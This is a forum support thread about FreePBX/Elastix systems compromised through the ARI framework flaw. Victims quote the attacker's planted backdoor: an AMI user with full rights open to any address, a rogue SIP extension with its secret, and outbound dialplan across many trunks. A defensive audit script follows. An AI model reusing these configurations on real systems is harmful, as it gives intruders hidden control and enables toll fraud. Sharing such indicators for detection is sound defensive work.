Hello,
Can you please help out regarding this critical update of ARI
Framework on Elastix system. I cannot update Freepbx to version 2.9
since Elastix latest stable release 2.4.0 uses Freepbx 2.8
I already tried upgrade and force it, but it breaks Elastix and web interface without possibility of recovery.
Is there a way to patch ARI framework on freePBX 2.8 without upgrading to ver 2.9?
Thank you very much.
Slaven.
You would need to talk with Elastix since they are using an old and unsupported version of FreePBX that has not been supported in a long time.
Please be aware that the files mentioned in this post are the only known exploit in the wild. When a notice like this goes live the code monkeys review the patch and go to work building their own ways to exploit the vulnerability. Don't assume because these files aren't present that you are safe. If you haven't updated you are still exposed. If you find other exploit signatures please let us know.
I also have been hacked by this vulnerability. And the interesting thing - I never trusted the freepbx web interface and did not want to have it available from the internet BUT…
but I could not block port 80 completely because I need to have other sites available.
So in the /etc/httpd/conf.d/freepbx.conf I have changed "Allow from All" to "Allow from 127.0.0.1 192.168.0". Everything was fine until one update replaced it with a "clean" freepbx.conf with "allow all".
You are doing security settings but update just removes them. Very nice!
This vulnerability has nothing to do with the FreePBX webui; it is within a 3rd party component we include called the Asterisk Recording Interface Framework. With 12 we have deprecated use of this component in favor of our own solution, the UCP. Generally you would never make changes to any packaged config because updating of its parent package will nuke your changes. Also Apache is not the correct place to be blocking/allowing IP addresses. If they have gotten to apache they are already in even if apache says no. Access control should be done ideally at the edge of your network. If your PBX is at the edge of your network for some odd reason then use IPTables to control IP based access.
Apache is good enough to restrict access for virtual sites. It was not a problem with Apache, it was a problem with the update that replaced the security file. It's like an iptables update cleaning all iptables rules. If a conf file is changed, the normal behavior is to keep it and rename the new file to "rpmnew".
I see that the distro on the downloads page is still 5.211.65-16, maybe that should be -19?
It already has been updated. Looks like someone forgot to update the text. Will do that now but it does install -19
How do I know that the issue is resolved?
FreePBX 2.11
I updated Freepbx distro but attacker created freepbx admin user, and I cannot delete it. Please help me with this
attacker admin user: mgknight
Same issue as harrytran. I’ve got a user mgknight that I cannot delete. Any help appreciated.
Thanks!
Westley
Were your systems updated before these users were created?
No for me. I tried deleting both before and after updating.
Westley
What happens when you try to delete it?
It goes thru the process like it is trying to delete, but never actually does.
No error or warning messages.
What version of FreePBX?
I found these files modified:
You'll find the Admin user modified, a new user called mgknight and a new ext 1986.
Manager_custom.conf
Sip_customer.conf
Extensions_customer.conf
manager_customer.conf
[mgknight]
secret=mgklives
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
writetimeout = 5000
sip_customer.conf
[1986]
host=dynamic
context=from-internal
secret=qhIoiHzZes
type=friend
Extensions_custom.conf
[from-internal-noxfer-custom]
exten => _1986.,1,Macro(user-callerid,LIMIT,EXTERNAL,)
exten => _1986.,n,ExecIf($[ "${CALLEE_ACCOUNCODE}" != "" ] ?Set(CDR(accountcode)=${CALLEE_ACCOUNCODE}))
exten => _1986.,n,Set(MOHCLASS=${IF($["${MOHCLASS}"=""]?default:${MOHCLASS})})
exten => _1986.,n,Set(_NODEST=)
exten => _1986.,n,Gosub(sub-record-check,s,1(out,${EXTEN},))
exten => _1986.,n,Macro(dialout-trunk,1,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,2,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,3,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,4,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,5,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,6,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,7,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,8,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,9,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,10,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,11,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,12,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,13,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,14,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,15,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,16,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,17,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,18,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,19,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,20,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,21,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,22,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,23,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,24,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,25,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,26,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,27,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,28,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,28,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,29,${EXTEN:4},off)
exten => _1986.,n,Macro(dialout-trunk,30,${EXTEN:4},off)
exten => _1986.,n,Macro(outisbusy,)
[mgkext]
exten => _X.,1,NoOp("Click in Context")
exten => _X.,n,Answer(999999999999999999)
exten => _X.,n,Wait(999999999999999999)
Even though my username was missing in the Administrator page, I was still able to access the system via SSH and web-browser.
I performed a backup and only restored /var & /etc.
After the backup was complete the mgknight and ext 1986 were gone.
I then performed updates via the Module page.
My system has been stable since.
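A defender-side check for the kind of artefacts listed above, as an added example (this is not code from the thread or from FreePBX); the sample config and the list of known AMI users are constructed:

```python
"""Audit an Asterisk manager_custom.conf for AMI users the administrator did not create.

Added example (not code from the thread or FreePBX): parses the ini-style sections
Asterisk uses and flags the artefacts described above: a manager user missing from the
administrator's list, a permit= admitting any address, and write= rights for commands/originate."""
import re

# Constructed sample, modelled on the manager_custom.conf entry quoted in the thread.
SAMPLE_MANAGER = """\
[mgknight]
secret=mgklives
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
writetimeout = 5000
"""

def parse_sections(text):
    """Parse Asterisk ini-style config into {section: {key: value}}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        header = re.match(r"^\[([^\]]+)\]", line)
        if header:
            current = sections.setdefault(header.group(1), {})
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            # repeated keys (e.g. several permit= lines) are joined with ','
            current[key] = f"{current[key]},{value}" if key in current else value
    return sections

def audit_manager(text, known_users):
    """Return one finding per problem; an empty list means nothing suspicious."""
    findings = []
    for name, kv in parse_sections(text).items():
        if name == "general":  # [general] holds daemon settings, not a user
            continue
        if name not in known_users:
            findings.append(f"{name}: AMI user not in administrator's list")
        permits = kv.get("permit", "")
        if "0.0.0.0/0.0.0.0" in permits or "0.0.0.0/0" in permits:
            findings.append(f"{name}: permit allows connections from any address")
        write = {right.strip() for right in kv.get("write", "").split(",")}
        risky = sorted(write & {"command", "config", "originate"})
        if risky:
            findings.append(f"{name}: write grants {','.join(risky)}")
    return findings

if __name__ == "__main__":
    for finding in audit_manager(SAMPLE_MANAGER, known_users=["admin"]):
        print(finding)
```

Run it against the real /etc/asterisk/manager_custom.conf (and the same parser works for sip_custom.conf) with your own list of legitimate users; any finding on a peer you did not create is worth treating as a compromise indicator.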
I forgot to add to my comments - that I created a new FreePBX install
and then restored my backup from before the exploit hit my system.
Sorry for any confusion.
Good Luck!!